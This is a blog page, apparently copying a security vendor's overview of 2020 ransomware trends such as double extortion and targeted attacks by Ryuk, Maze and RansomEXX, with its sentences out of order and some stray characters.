![]() These are typically found in underground forums from other data exfiltration campaigns. A common tactic for ransomware involved the use of opened and unsecured RDP ports. Common vulnerabilities observed in ransomware attacks from last year include CVE-2019-19781, CVE-2019-11510, and CVE-2019-11510. Ransomware families like Sodinokibi and RansomEXX have been seen consistently using vulnerabilities in remote access tools for their attacks. Examples of ransomware attacks from 2020 that started with phishing emails include Ryuk, Egregor, RansomEXX, and Doppelmayer. Depending on their target, they can use familiar techniques and entry points such as phishing emails, vulnerabilities, or compromised accounts. Threat actors can use several methods to penetrate a system’s defenses. We further discuss this as our first case study in a later section. A good example is a Sodinokibi attack that used a software’s uninstaller to disable existing applications in the victim’s machines. Campaigns are beginning to look a lot more customized, seeing how they change their techniques according to the environment. However, 2020 saw a wider variety of tools used for various purposes such as reconnaissance and process termination. Targeted, human-operated ransomware has been reported for more than a year. RansomExx is an example of a ransomware variant that utilized several legitimate tools to quickly deploy its final payload Once they have enough information, they utilize living-off-the-land techniques and compromised accounts to move laterally, search the information that they need, exfiltrate data, and finally, deploy their ransomware. If their information is lacking, they use hack tools such as network scanners or legitimate administrative tools for reconnaissance. In most cases, the attackers already have some level of knowledge about their target’s environment. Threat actors utilized familiar tactics, techniques, and procedures (TTPs) no different from other advance persistent threats (APTs) or targeted attacks. The conditions for double extortions were likely created by the targeted approach that ransomware has adopted. This timeline (Nov 2019 to Oct 2020) shows that ransomware attacks that involved double extortion happened months apart. Other notable variants used in double extortion campaigns are Nefilim, Sodinokibi, Nemty, RansomEXX, and DoppelPaymer, some of which we will discuss further as case studies.įigure 2. In October 2020, it ceased operations only for a new malware Egregor to take its place. It began operating in 2019 when it conducted several high-profile attacks and even publicly named its victims. Maze is an example of a ransomware family that used this tactic and made good of its threat to publicize stolen files. ![]() Such attacks could cost organizations more money and tarnish their reputation and brand image. This is a real threat, especially for larger organizations that keep sensitive personal and proprietary information. It increased the stakes and added pressure for victims to make a deal. Cybercriminals didn’t just deny access by encrypting their victims’ files they also started to threaten to expose the files if the target didn’t pay the ransom. Overall, we saw an increase of new ransomware families, from 95 in 2019 to 127 in 2020, despite the decreased detection of ransomware-related components.ĭouble extortion stood out as the common ransomware theme in 2020, as data breaches became a significant part of the campaigns. The year seemed conducive to the development of new ransomware to a narrowing range of targets. We will discuss Ryuk and RansomExx attacks as two of our chosen case studies that demonstrate this trend in 2020 in a later section.įigure 1. By 2019, ransomware attacks have taken on a more targeted approach, which became the norm entering 2020. It also used PowerShell and WMI extensively for lateral movement. It used Trickbot and its modules to propagate and install PowerShell Empire. Ryuk was among the first documented ransomware that operated like a targeted attack. That same year, Ryuk appeared and set a new standard. ![]() However, we soon learned that the trend only signified a major turning point for ransomware. By 2018, ransomware development seemed to have slowed down as cryptocurrency miners overtook ransomware in terms of detection and new ransomware families decreased. ![]() In response to these massive ransomware attacks, organizations strengthened their defenses. Many new ransomware families emerged in 2016, and in 2017 WannaCry/Wcry wreaked havoc across the globe. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |